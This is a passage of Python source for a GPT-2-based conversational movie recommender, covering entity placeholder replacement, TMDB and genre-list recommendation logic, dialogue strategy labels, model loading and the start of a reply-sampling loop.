find_name(new_text, name_db, name_dict, director_dict, people_dict):\n\ttemp_text = new_text.split(\"[SEP]\")\n\tnew_text = temp_text[0]\n\tending = \"\"\n\tif len(temp_text) > 1 and temp_text[1] != \"\":\n\t\tending = \"[SEP]\" + temp_text[1]\n\tnew_name_dict = name_dict\n\tnew_director_dict = director_dict\n\tnew_people_dict = people_dict\n\tpunctuations = set(string.punctuation)\n\treturned_text = \"\"\n\ttokenized_text = new_text.encode('ascii', 'ignore').decode('ascii').split(\" \")\n\tthe_text = []\n\tpeople_names = []\n\tinfo_list = 
[]\n\tindex = 0\n\tpeople_indexer = 1\n\n\twhile index < len(tokenized_text):\n\t\ttoken = tokenized_text[index]\n\t\tcondition1 = len(token) > 1 and token[0].isupper() and index+1 < len(tokenized_text)\n\t\tcondition2 = len(token) > 1 and (token[0] == \"(\" or token[0] == '\"') and index+1 < len(tokenized_text) and token[1].isupper() and index+1 < len(tokenized_text) and token[len(token)-1] not in punctuations\n\t\t\n\t\tif condition1:\n\t\t\tname_token = token\n\t\t\tbefore_punct = \"\"\n\n\t\tthe_punct = \"\"\n\t\tif condition2:\n\t\t\tname_token = token[1:]\t\t\t\t\t\t\n\t\t\tbefore_punct = token[0]\t\n\n\t\tprocessed = False\n\t\tafter_punct = \"\"\n\t\tnext_names = []\n\t\tif condition1 or condition2:\n\n\t\t\t\n\t\t\tnext_idx = index+1\n\t\t\twhile next_idx < len(tokenized_text):\n\t\t\t\tnext_token = tokenized_text[next_idx]\n\t\t\t\t\n\n\t\t\t\tif len(next_token) > 1 and (next_token[0].isupper() or next_token == \"de\") and len(next_token) > 1:\n\t\t\t\t\tif name_token in name_db:\n\t\t\t\t\t\t\n\t\t\t\t\t\t#check if next token has punctuations?\n\t\t\t\t\t\tnext_name = \"\"\n\t\t\t\t\t\t# print(next_token)\n\t\t\t\t\t\tend = len(next_token)\n\t\t\t\t\t\tif end >= 3 and next_token[:3] == \"Jr.\":\n\t\t\t\t\t\t\tinit = 3\n\t\t\t\t\t\t\tnext_name = \"Jr.\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tinit = 0\n\t\t\t\t\t\ttime_to_quit = False\n\t\t\t\t\t\t\n\t\t\t\t\t\tfor pos in range(init, end):\n\t\t\t\t\t\t\tchar = next_token[pos]\n\t\t\t\t\t\t\tif char not in punctuations:\n\t\t\t\t\t\t\t\tif not time_to_quit:\n\t\t\t\t\t\t\t\t\tnext_name += char\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif (char == \"'\" or char == \"-\") and pos != len(next_token) -1 and next_token[pos+1] not in punctuations:\n\t\t\t\t\t\t\t\t\t\tnext_name += char\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tafter_punct += char\n\t\t\t\t\t\t\t\t\ttime_to_quit = True\n\t\t\t\t\t\t\t\t\t\n\n\t\t\t\t\t\tnext_names.append(next_name)\n\t\t\t\t\t\tif time_to_quit:\n\t\t\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\tnext_idx += 1\n\n\t\tif len(next_names) >= 1:\n\t\t\t\n\t\t\tthe_names = \" \".join(next_names)\n\t\t\tfull_name = name_token + \" \" + the_names\n\t\t\tnext_names = []\n\t\t\tresult = search_person(full_name)\n\t\t\t\n\t\t\tif \"Star Wars\" not in full_name and \"Captain America\" not in full_name and \"James Bond\" not in full_name:\n\t\t\t\tif person_is_there(result):\n\t\t\t\t\tfull_name_from_db = result[\"results\"][0][\"name\"]\n\t\t\t\t\tedit_score = min_edit_distance(full_name, full_name_from_db)\n\t\t\t\t\tif edit_score <= 2:\n\t\t\t\t\t\t\n\n\t\t\t\t\t\tpeople_names.append(full_name)\n\t\t\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\t\t\tperson_job = info[\"known_for_department\"]\n\t\t\t\t\t\tperson_top_movies = info[\"known_for\"]\n\t\t\t\t\t\tif person_id not in person_db:\n\t\t\t\t\t\t\tperson_db[person_id] = {\"job\": person_job, \"top_movies\": person_top_movies, \"name\": full_name}\n\t\t\t\t\t\tinfo_list.append(person_id)\n\t\t\t\t\t\tif person_job == \"Acting\":\n\t\t\t\t\t\t\tjob_type = \"ACTOR\"\n\t\t\t\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\n\t\t\t\t\t\telif person_job == \"Directing\":\n\t\t\t\t\t\t\tjob_type = \"DIRECTOR\"\n\t\t\t\t\t\t\tif full_name in new_director_dict:\n\t\t\t\t\t\t\t\tname_idx = new_director_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = 
len(new_director_dict)\n\t\t\t\t\t\t\t\tnew_director_dict[full_name] = name_idx\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tjob_type = \"PEOPLE\"\n\t\t\t\t\t\t\tif full_name in new_people_dict:\n\t\t\t\t\t\t\t\tname_idx = new_people_dict[full_name]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tname_idx = len(new_people_dict)\n\t\t\t\t\t\t\t\tnew_people_dict[full_name] = name_idx\n\n\t\t\t\t\t\t\n\t\t\t\t\t\tplaceholder = before_punct + \"[MOVIE_P_{}_{}]\".format(job_type, name_idx) + after_punct\n\t\t\t\t\t\tthe_text.append(placeholder)\n\t\t\t\t\t\t\n\n\t\t\t\t\t\tpeople_indexer += 1\n\t\t\t\t\t\tprocessed = True\n\n\t\tif processed:\n\t\t\tindex = next_idx\n\t\telse:\n\t\t\tif \"Schwarzenegger\" in token:\n\t\t\t\tresult = search_person(\"Schwarzenegger\")\n\t\t\t\tname = result[\"results\"][0][\"name\"]\n\t\t\t\tpeople_names.append(name)\n\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\tinfo_list.append(person_id)\n\t\t\t\tfull_name = name\n\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\telse:\n\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\t\t\t\ttoken = token.replace(\"Schwarzenegger\", \"[MOVIE_P_ACTOR_{}]\".format(name_idx))\n\t\t\tif \"Awkwafina\" in token:\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tresult = search_person(\"Awkwafina\")\n\t\t\t\tname = result[\"results\"][0][\"name\"]\n\t\t\t\tpeople_names.append(name)\n\t\t\t\tinfo = result[\"results\"][0]\n\t\t\t\tperson_id = info[\"id\"]\n\t\t\t\tinfo_list.append(person_id)\n\t\t\t\tfull_name = name\n\t\t\t\tif full_name in new_name_dict:\n\t\t\t\t\tname_idx = new_name_dict[full_name]\n\t\t\t\telse:\n\t\t\t\t\tname_idx = len(new_name_dict)\n\t\t\t\t\tnew_name_dict[full_name] = name_idx\n\t\t\t\ttoken = token.replace(\"Awkwafina\", \"[MOVIE_P_ACTOR_{}]\".format(name_idx))\n\n\t\t\tthe_text.append(token)\n\t\t\tindex += 1\n\n\tthe_text = \" \".join(the_text)\n\n\treturn the_text+ending, people_names, new_name_dict, new_people_dict, new_director_dict\n\nSENTIMENT_URL = 'SENTIMENT_DETECTION_SERVICE_URL'\nheaders = {'content-type': 'application/json'}\ndef get_sentiment(text):\n\tsentence = str(text).lower()\n\tdata = [{\"text\": sentence}]\n\tdata = json.dumps(data)\n\tTIMEOUT = 50\n\tresult = requests.post(url=SENTIMENT_URL, data=data, headers=headers, timeout=TIMEOUT).json()\n\treturn result[0]\n\ndef load_movie_to_dict():\n\tfilename = \"filePath.tsv\"\n\tmovie_map_dict = {}\n\tdata = pd.read_csv(filename, sep=\"\\t\")\n\ttitle_to_id = {}\n\tfor idx, row in data.iterrows():\n\t\tmovie_id = row['movie_id']\n\t\ttitle = row['title']\n\t\tyear = row['year']\n\t\tmovie_map_dict[movie_id] = {\"title\": title, \"year\": year}\n\t\ttitle_to_id[title+ \" ({})\".format(year)] = movie_id\n\treturn movie_map_dict, title_to_id\n\ndef have_youtube_trailer(full_movie_dataset, title_to_id):\n\tdata = pd.read_csv(full_movie_dataset, sep=\"\\t\")\n\tvalid_id = {}\n\tfor idx, row in data.iterrows():\n\t\ttitle = row['title']\n\t\tyear = row['year']\n\t\tkey = title+ \" ({})\".format(year)\n\t\tif key in title_to_id:\n\t\t\tval = title_to_id[key]\n\t\t\tvalid_id[val] = row\n\n\treturn valid_id\n\nvalid_id = have_youtube_trailer(\"filePath.tsv\", title_to_id)\n\ndef load_movie_db():\n the_dict = {}\n popular_action_movies = \"filePath.tsv\"\n action_movie = pd.read_csv(popular_action_movies, sep=\"\\t\")\n \n popular_comedy_movies = \"filePath.tsv\"\n comedy_movie = pd.read_csv(popular_comedy_movies, sep=\"\\t\")\n \n popular_drama_movies = \"filePath.tsv\"\n 
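# each \"filePath.tsv\" here is a scrubbed placeholder path; the loaders assume\n    # tab-separated files with at least 'title', 'year' and 'genre' columns\n    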
drama_movie = pd.read_csv(popular_drama_movies, sep=\"\\t\")\n \n popular_scifi_movies = \"filePath.tsv\"\n scifi_movie = pd.read_csv(popular_scifi_movies, sep=\"\\t\")\n \n popular_horror_movies = \"filePath.tsv\"\n horror_movie = pd.read_csv(popular_horror_movies, sep=\"\\t\")\n \n popular_documentary_movies = \"filePath.tsv\"\n doc_movie = pd.read_csv(popular_documentary_movies, sep=\"\\t\")\n \n the_dict['action'] = action_movie\n the_dict['comedy'] = comedy_movie\n the_dict['drama'] = drama_movie\n the_dict['scifi'] = scifi_movie\n the_dict['horror'] = horror_movie\n the_dict['documentary'] = doc_movie\n \n return the_dict\n\npopular_movies_by_genre = load_movie_db()\nprint(\"Finish loading movies...\")\n\ndef load_movies_by_genre(genre):\n if genre == \"western\":\n path = \"filePath.tsv\"\n elif genre == \"war\":\n path = \"filePath.tsv\"\n elif genre == \"thriller\":\n path = \"filePath.tsv\"\n elif genre == \"sport\":\n path = \"filePath.tsv\"\n elif genre == \"romance\":\n path = \"filePath.tsv\"\n elif genre == \"mystery\":\n path = \"filePath.tsv\"\n elif genre == \"animation\":\n path = \"filePath.tsv\"\n elif genre == \"family\":\n path = \"filePath.tsv\"\n elif genre == \"fantasy\":\n path = \"filePath.tsv\"\n elif genre == \"biography\":\n path = \"filePath.tsv\"\n elif genre == \"musical\":\n path = \"filePath.tsv\"\n else:\n path = \"filePath.tsv\"\n \n movies = pd.read_csv(path, sep=\"\\t\")\n return movies\n\ndef load_vector(input_file):\n\tlist_id_to_movie_id = {}\n\tmovie_id_to_list_id = {}\n\tmovie_list = []\n\twith open(input_file, 'r') as read_file:\n\t\tcounter = 0\n\t\tfor each_line in read_file:\n\t\t\tthe_list = each_line.strip().split(\"\\t\")\n\t\t\tmovie_id = the_list[0].replace(\"movieID_\", \"\")\n\t\t\tmovie_id = int(movie_id)\n\t\t\tlist_id_to_movie_id[counter] = movie_id\n\t\t\tmovie_id_to_list_id[movie_id] = counter\n\t\t\tmovie_list.append(the_list[1:])\n\t\t\tcounter += 1\n\n\tnp_list = np.array(movie_list)\n\n\treturn np_list, list_id_to_movie_id, movie_id_to_list_id\n\ndef search(movie_id, matrix, N):\n\tmovie_score = matrix[movie_id:movie_id+1]\n\n\tsim_matrix_score = cosine_similarity(movie_score, matrix)\n\n\tid_sim_score_dict = {}\n\tfor idx, element in enumerate(sim_matrix_score.flatten()):\n\t\tid_sim_score_dict[idx] = element\n\tsorted_key = sorted(id_sim_score_dict, key=id_sim_score_dict.get, reverse=True)\n\ttop_N_indexes = sorted_key[:N]\n\tif debug_print:\n\t\tprint(top_N_indexes)\n\treturn top_N_indexes\n\ndef filter_movies(current_movie_id, other_movie_id, movie_map):\n try:\n current_mv_info = movie_map[current_movie_id]\n other_mv_info = movie_map[other_movie_id]\n\n current_mv_genre = set(current_mv_info['genre'].lower().split(\", \"))\n other_genre = set(other_mv_info['genre'].lower().split(\", \"))\n intersection_genre = current_mv_genre.intersection(other_genre)\n except:\n return False\n if len(intersection_genre) > 0:\n return True\n else:\n return False\n \n\ndef get_title(movie_id, top_N_indexes, movie_map, counter_movie_id):\n from_list_to_movie_id = counter_movie_id[movie_id]\n from_movie_id_to_title = movie_map[from_list_to_movie_id]\n the_result = []\n for movie_id_in_list in top_N_indexes:\n result = counter_movie_id[movie_id_in_list]\n if True:\n if result in valid_id and result != counter_movie_id[movie_id]:\n filtered = filter_movies(counter_movie_id[movie_id], result, valid_id)\n if filtered:\n title = movie_map[result][\"title\"]\n current_year = int(movie_map[result][\"year\"])\n \n if the_result == []:\n 
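# first match seeds the list; later matches are insertion-sorted below\n                        # so the final list stays ordered by year, newest first\n                        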
the_result.append(title + \" ({})\".format(current_year))\n else:\n temp_result = []\n is_inserted = False\n for element in the_result:\n content = element.split(\" \")\n \n element_title = \" \".join(content[:len(content)-1])\n element_year = int(content[len(content)-1].replace(\"(\",\"\").replace(\")\", \"\"))\n if element_year >= current_year:\n if element not in temp_result:\n temp_result.append(element)\n else:\n if not is_inserted:\n temp_result.append(title + \" ({})\".format(current_year))\n is_inserted = True\n temp_result.append(element)\n if not is_inserted:\n temp_result.append(title + \" ({})\".format(current_year))\n the_result = temp_result\n\n \n return the_result\n\ndef load_actor():\n with open('ACTOR_DATA_Path.tsv', 'rb') as file:\n actor_data = pickle.load(file)\n return actor_data\n\n\ndef get_actor_movies(actor_data, positive_actor, user_favorites):\n list_of_movies = actor_data[positive_actor]\n try:\n fav_genre_list = user_favorites['genre']\n except:\n fav_genre_list = []\n if len(list_of_movies) >= 1:\n recommended_movie = None\n founded = False\n for movie in list_of_movies:\n genres = movie['genre']\n genre_list = genres.split(\", \")\n if len(genre_list) >= 1:\n for genre in genre_list:\n if genre in fav_genre_list:\n recommended_movie = movie\n founded = True\n break\n if founded:\n break\n if not founded:\n recommended_movie = list_of_movies[0]\n \n movie_title = recommended_movie['title']\n movie_year = recommended_movie['year']\n return [movie_title + \" ({})\".format(movie_year)]\n else:\n return []\n\ndef recommend_from_tmdb(movie_title):\n tokenized_title = movie_title.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_title\n recommendations = []\n \n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n \n tmdb_movie_id = \"\"\n if len(results) > 0:\n tmdb_movie_id = results[0]['id']\n \n if tmdb_movie_id != \"\":\n rec_url = \"url\".format(tmdb_movie_id, TMDB_KEY)\n rec_result_json = urlopen(rec_url).read().decode('utf8')\n rec_info = json.loads(rec_result_json)\n results = rec_info['results']\n for item in results:\n title = item['title']\n year = item['release_date'].split(\"-\")[0]\n title_and_year = title + \" ({})\".format(year)\n if title_and_year in title_to_id:\n movie_id = title_to_id[title_and_year]\n if movie_id in valid_id:\n recommendations.append(title_and_year)\n \n return recommendations\n\n\ndef give_recommendation(user_favorite_thing, positive_genre, positive_actor, fav_attribute, already_recommended, n=2):\n fav_movie = user_favorite_thing['movies']\n fav_genre = user_favorite_thing['genres']\n fav_actor = user_favorite_thing['actors']\n \n recommendation = []\n if (fav_movie == [] and positive_actor==\"\") or fav_attribute == \"genre\":\n if debug_print:\n print(\"Give recommendation based on GENRE:\" + str(positive_genre))\n target_genre = positive_genre\n\n if target_genre not in popular_movies_by_genre:\n movies = load_movies_by_genre(target_genre)\n popular_movies_by_genre[target_genre] = movies\n \n list_of_movies = popular_movies_by_genre[target_genre]\n \n taken = False\n n_taken = 0\n for idx in range(100):\n movie_desc = list_of_movies.iloc[idx]\n title = movie_desc['title']\n year = movie_desc['year']\n key = title + \" ({})\".format(year)\n if key not in already_recommended:\n genres = movie_desc['genre'].lower().split(\", \")\n 
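# 'genres' is parsed but not used in this branch; the pick is purely by\n                    # popularity rank, and already_recommended blocks duplicates\n                    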
\n                    already_recommended[key] = movie_desc\n                    recommendation.append(key)\n                    taken = True\n                    n_taken += 1\n                    \n                    if n_taken == n:\n                        break\n    else:\n        if positive_actor != \"\":\n            if debug_print:\n                print(\"Give recommendation based on ACTOR:\" + str(positive_actor))\n            recommendation = get_actor_movies(actor_data, positive_actor, user_favorite_thing)\n        if fav_attribute != \"actor\" or recommendation == []:\n            if debug_print:\n                print(\"Give recommendation based on MOVIE\")\n            last_mentioned = fav_movie[len(fav_movie)-1]\n            if debug_print:\n                print(\"last mentioned MOVIE in give recommendation: \", last_mentioned)\n            recommended_titles = recommend_from_tmdb(last_mentioned)\n            recommendation = recommended_titles\n            if recommendation == []:\n                #remove year\n                remove_year = last_mentioned.split(\" \")\n                title_only = \" \".join(remove_year[:len(remove_year)-1])\n                recommendation = recommend_from_tmdb(title_only)\n            if recommendation == [] and positive_genre != \"\":\n                target_genre = positive_genre\n\n                if target_genre not in popular_movies_by_genre:\n                    movies = load_movies_by_genre(target_genre)\n                    popular_movies_by_genre[target_genre] = movies\n\n                list_of_movies = popular_movies_by_genre[target_genre]\n\n                taken = False\n                n_taken = 0\n                for idx in range(100):\n                    movie_desc = list_of_movies.iloc[idx]\n                    title = movie_desc['title']\n                    year = movie_desc['year']\n                    key = title + \" ({})\".format(year)\n                    if key not in already_recommended:\n                        genres = movie_desc['genre'].lower().split(\", \")\n\n                        already_recommended[key] = movie_desc\n                        recommendation.append(key)\n                        taken = True\n                        n_taken += 1\n\n                        if n_taken == n:\n                            break    \n    \n    return recommendation, already_recommended\n\ndef get_movie_plot(text, movie_name):\n    if \"PLOT]\" in text:\n        tokenized_title = movie_name.split(\" \")\n        if len(tokenized_title)>1:\n            title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n        else:\n            title = movie_name\n        try:\n            the_url = \"url\".format(TMDB_KEY, title)\n            movie_json = urlopen(the_url).read().decode('utf8')\n            movie_info = json.loads(movie_json)\n\n            results = movie_info['results']\n            if len(results) > 0:\n                content = results[0]['overview']\n                if \"[MOVIE_PLOT]\" in text:\n                    result = text.replace(\"[MOVIE_PLOT]\", '[SPLIT]\"{}\"[SPLIT]'.format(content))\n                    content = result.split(\"[SPLIT]\")\n                    temp_list = []\n                    for element in content:\n                        temp_list.append(element.strip())\n                    result = \" \".join(temp_list)\n                    result = result.strip()\n                elif \"PLOT]\" in text:\n                    result = text.replace(\"PLOT]\", '[SPLIT]\"{}\"[SPLIT]'.format(content))\n                    content = result.split(\"[SPLIT]\")\n                    temp_list = []\n                    for element in content:\n                        temp_list.append(element.strip())\n                    result = \" \".join(temp_list)\n                    result = result.strip()\n            else:\n                result = text\n            return result\n        except:\n            return \"The movie has interesting plot\"\n    elif \"It is about\" in text:\n        new_text = text.split(\"It is about\")\n        \n        try:\n            if title_to_id[movie_name] in valid_id:\n                content = valid_id[title_to_id[movie_name]]\n                summary = content['short_plot']\n                text = new_text[0] + ' \"' + summary + '\"'\n                \n            else:\n                tokenized_title = movie_name.split(\" \")\n                if len(tokenized_title)>1:\n                    \n                    title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n                else:\n                    title = movie_name\n                the_url = \"url\".format(TMDB_KEY, title)\n                movie_json = urlopen(the_url).read().decode('utf8')\n                movie_info = json.loads(movie_json)\n\n                results = movie_info['results']\n                if len(results) > 0:\n                    content = results[0]['overview']\n                    text = new_text[0] + 'It is about \"' + content + '\"'\n                else:\n                    return \"It has an interesting story\"\n        
except:\n return \"The movie has interesting plot\"\n return text.strip()\n else:\n return text.strip()\n\n\ndef replace_actors(text, movie_name, mentioned_actors, last_mentioned, idx_turn):\n actor_list = []\n if \"P_ACTOR\" in text:\n text = text.strip()\n if movie_name in title_to_id and title_to_id[movie_name] in valid_id:\n content = valid_id[title_to_id[movie_name]]\n actor_list = content['actors'].split(\", \")\n if debug_print:\n print(actor_list)\n else:\n tokenized_title = movie_name.split(\" \")\n if len(tokenized_title)>1:\n title = \"+\".join(tokenized_title[:len(tokenized_title)-1])\n else:\n title = movie_name\n the_url = \"url\".format(TMDB_KEY, title)\n movie_json = urlopen(the_url).read().decode('utf8')\n movie_info = json.loads(movie_json)\n results = movie_info['results']\n\n tmdb_movie_id = \"\"\n if len(results) > 0:\n tmdb_movie_id = results[0]['id']\n cast_url = \"url\".format(tmdb_movie_id, TMDB_KEY)\n cast_json = urlopen(cast_url).read().decode('utf8')\n cast_info = json.loads(cast_json)\n cast = cast_info[\"cast\"]\n actor_list = []\n for character in cast:\n the_name = character[\"name\"]\n actor_list.append(the_name)\n if len(actor_list) >= 4:\n break\n else:\n actor_list = []\n \n if actor_list == []:\n return \"I think the movie has great actors in it!\", mentioned_actors\n\n \n taken_actor = []\n result = text.replace(\"[MOVIE_PLOT]\", '\"{}\"'.format(content['short_plot']))\n tokenized_sent = text.split(\" \")\n \n actor_token_counter = 0\n normal_token_counter = 0\n \n placeholder_id_to_text = {y:x for x,y in mentioned_actors.items()}\n print(placeholder_id_to_text )\n coref_text = []\n noncoref_text = []\n i = 0\n j = 0\n new_mentioned1 = mentioned_actors\n new_mentioned2 = mentioned_actors\n tokenized_by_comma = text.split(\",\")\n prev_word = \"\"\n if len(last_mentioned) > 1:\n diff_turn = idx_turn - last_mentioned[1]\n else:\n diff_turn = 0\n threshold_name = 3\n for token in tokenized_sent:\n has_actor = False\n if \"[MOVIE_P_ACTOR_\" in token:\n get_idx = token.split(\"[MOVIE_P_ACTOR_\")\n has_actor = True\n elif \"P_ACTOR_\" in token:\n get_idx = token.split(\"P_ACTOR_\")\n has_actor = True\n else:\n has_actor = False\n \n if has_actor:\n if get_idx[0] != \"\":\n prev_word = get_idx[0]\n coref_text.append(prev_word)\n normal_token_counter += 1\n \n temp = get_idx[len(get_idx)-1].split(\"]\")\n\n idx = int(temp[0])\n if last_mentioned != []:\n if diff_turn < threshold_name:\n if debug_print:\n print(\"less than 2\")\n the_list = last_mentioned[0]\n actor_name = the_list[len(the_list)-1]\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name+temp_str)\n else:\n if debug_print:\n print(\"not less\")\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n else:\n coref_text.append(\"this actor\")\n \n elif idx in placeholder_id_to_text:\n if debug_print:\n print(\"it is in placeholder\")\n if diff_turn > threshold_name:\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in 
new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n else: \n actor_name = placeholder_id_to_text[idx]\n if debug_print:\n print(\"here: \" + actor_name)\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name+temp_str)\n else:\n if i < len(actor_list):\n\n actor_name = actor_list[i]\n i += 1\n temp_str = \"]\".join(temp[1:])\n if temp_str not in set(string.punctuation):\n temp_str = \" \"+temp_str\n coref_text.append(actor_name + temp_str)\n if actor_name not in new_mentioned1:\n new_mentioned1[actor_name] = len(new_mentioned1)\n placeholder_id_to_text = {y:x for x,y in new_mentioned1.items()}\n \n actor_token_counter += 1\n \n else:\n coref_text.append(token)\n noncoref_text.append(token)\n normal_token_counter += 1\n \n actor2_token = 0\n actor_noncoref = []\n for token in tokenized_by_comma:\n if \"[MOVIE_P_ACTOR_\" in token:\n get_idx = token.split(\"[MOVIE_P_ACTOR_\")\n \n temp = get_idx[len(get_idx)-1].split(\"]\")\n if j >= len(actor_list):\n break\n another_actor_name = actor_list[j]\n actor_noncoref.append(another_actor_name+\"]\".join(temp[1:]))\n j += 1\n \n if another_actor_name not in new_mentioned2:\n new_mentioned2[another_actor_name] = len(new_mentioned2)\n \n actor2_token += 1\n \n else:\n normal_token_counter += 1\n \n if (normal_token_counter - actor_token_counter) >= 2 or (normal_token_counter - actor2_token) > 2 or actor_token_counter == 1:\n if debug_print:\n print(\"normal\")\n result = \" \".join(coref_text)\n return result, new_mentioned1\n else:\n if debug_print:\n print(\"nonnormal: actor2 token \" + str(actor2_token) + \" other: \" + str(normal_token_counter))\n print(\"noncoref: \" + str(noncoref_text))\n result = \", \".join(actor_noncoref)\n return result, new_mentioned2\n else:\n return text, mentioned_actors\n\ndef RemoveStrategyAndSEP(sentence):\n sent = re.sub(r'\\<[[a-z]*[_]*[[a-z]*\\>', \" \", sentence).strip()\n segment = sent.split(\"[SEP]\")\n return segment[0].strip()\n\ndef removeSEP(sentence):\n segment = sentence.split(\"[SEP]\")\n return segment[0].strip()\n\ndef CheckMoviePlot(tokenizer, response):\n\tcontain_movie_plot = False\n\tindex_movie_plot = tokenizer.encode(\"[MOVIE_PLOT]\")[0]\n\tif index_movie_plot in response:\n\t\tcontain_movie_plot = True\n\treturn contain_movie_plot\n\ndef similarity(candidate_rec_utt, last_rec_response):\n intersection = set(candidate_rec_utt).intersection(set(last_rec_response))\n overlap = len(intersection) / len(set(last_rec_response))\n return overlap\n\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"CUDA_INDEX\"\ndevice = torch.device(\"cuda\")\ndebug_print = False\n\nACTOR_TEMPLATES = [\"The movie has talented actors!\", \"The actors are really great.\", \"I like the actors!\"]\nMOVIE_PLOT_TEMPLATES = [\"The movie story is very interesting!\", \"It has interesting story.\", \"The plot is very interesting!\"]\n\nlabel_to_strategy = {0: 'no_strategy',\n 1: 'opinion_inquiry',\n 2: 'self_modeling',\n 3: 'personal_opinion',\n 4: 'credibility',\n 5: 'encouragement',\n 6: 'similarity',\n 7: 'rephrase_preference',\n 8: 'preference_confirmation',\n 9: 'experience_inquiry',\n 10: 'acknowledgment',\n 11: 'personal_experience',\n 12: 'offer_help'}\n\nlabel_to_recommendation = {0: 'not_recommendation', 1: 'recommendation'}\n\ngenre_from_tmdb = {28: \"action\", 12: \"adventure\", 16: \"animation\", 35: \"comedy\", 80: \"crime\", 99:\"documentary\", 18 : 
\"drama\"}\ngenre_from_tmdb[10751] = \"family\"\ngenre_from_tmdb[14] = \"fantasy\"\ngenre_from_tmdb[36] = \"history\"\ngenre_from_tmdb[27] = \"horror\"\ngenre_from_tmdb[10402] =\"music\"\ngenre_from_tmdb[9648] = \"mystery\"\ngenre_from_tmdb[10749] = \"romance\"\ngenre_from_tmdb[878] = \"sci-fi\"\ngenre_from_tmdb[10770] = \"tv movie\"\ngenre_from_tmdb[53] = \"thriller\"\ngenre_from_tmdb[10752] = \"war\"\ngenre_from_tmdb[37] = \"western\"\n\ntokenizer = torch.load(\"TOKENIZER_PATH\")\nmodel_A_states, model_B_states = torch.load(\"MODEL_PATH\")\n\nconfig = GPT2Config()\nconfig.vocab_size = model_A_states[\"transformer.wte.weight\"].shape[0]\nmodel_A = GPT2LMHeadModel(config)\nmodel_B = GPT2LMHeadModel(config)\n\nmodel_A.load_state_dict(model_A_states)\nmodel_B.load_state_dict(model_B_states)\nmodel_A.to(device)\nmodel_B.to(device)\n\nmodel_A_states[\"transformer.wte.weight\"].shape\n\nstrategy_detector = torch.load(\"STRATEGY_CLS_MODEL_Path\")\nrecommendation_detector = torch.load(\"RECOMMENDATION_CLS_MODEL_PATH\")\n\nbert_tokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\", num_labels = 13)\n\nstrategy_detector.eval()\nrecommendation_detector.eval()\nmodel_A.eval()\nmodel_B.eval()\n\nprev_input_for_recommender = tokenizer.encode(\"A:\")\nprev_input_for_recommender = torch.LongTensor(prev_input_for_recommender).unsqueeze(0).to(device)\n\ncandidates_num = 3\nngram = 2\ntemperature = 0.8 \n\ntop_k = 400\ntop_p = 0.9\n\npast_for_recommender = None\n\n# sep = tokenizer.encode(\"\\n\\n\\n\")\nsep = [628, 198]\n\nmentioned_genres = {}\nmovie_mentioned = {}\nmentioned_actors = {}\nmentioned_people = {}\nmentioned_directors = {}\nfavorite = {\"genres\": [], \"movies\": [], \"actors\": []}\nalready_recommended = {}\ndisliked = {\"genres\": [], \"movies\": [], \"actors\": []}\npositive_last_mentioned_genre = \"\"\npositive_actor = \"\"\nlast_mentioned_attribute = \"\"\nlast_mentioned_movie = \"\"\nlast_mentioned_genre = \"\"\nlast_mentioned_actors = []\nkind_of_movie_question = False\nturn_counter = 0\n\nlast_rec_template = \"\"\nlast_rec_response = [-1]\nwhile True:\n \"Sampling based method\"\n \n with torch.no_grad():\n candidates_pool = []\n candidates_past_pool = []\n candidates_strategy = []\n candidates_recommendation = []\n \n # Sampling several candidates \n # (input: past memory from user model and input token(s); \n # output: one selected past memory for user model and one selected recommender response)\n for count in range(candidates_num):\n past = past_for_recommender\n prev_input = prev_input_for_recommender\n sent = []\n \n # Sampling one candidate\n for i in range(200):\n logits, past = model_A(prev_input, past=past)\n logits = logits[:, -1, :] / temperature\n logits = top_filtering(logits, top_k=top_k, top_p=top_p)\n probs = F.softmax(logits, -1)\n prev_input = torch.multinomial(probs, num_samples=1)\n prev_word = prev_input.item()\n\n if prev_word == 628:\n break\n else:\n sent.append(prev_word)\n # save candidate and corresponding past memory\n candidates_pool.append(sent)\n candidates_past_pool.append(past)\n\n # Use 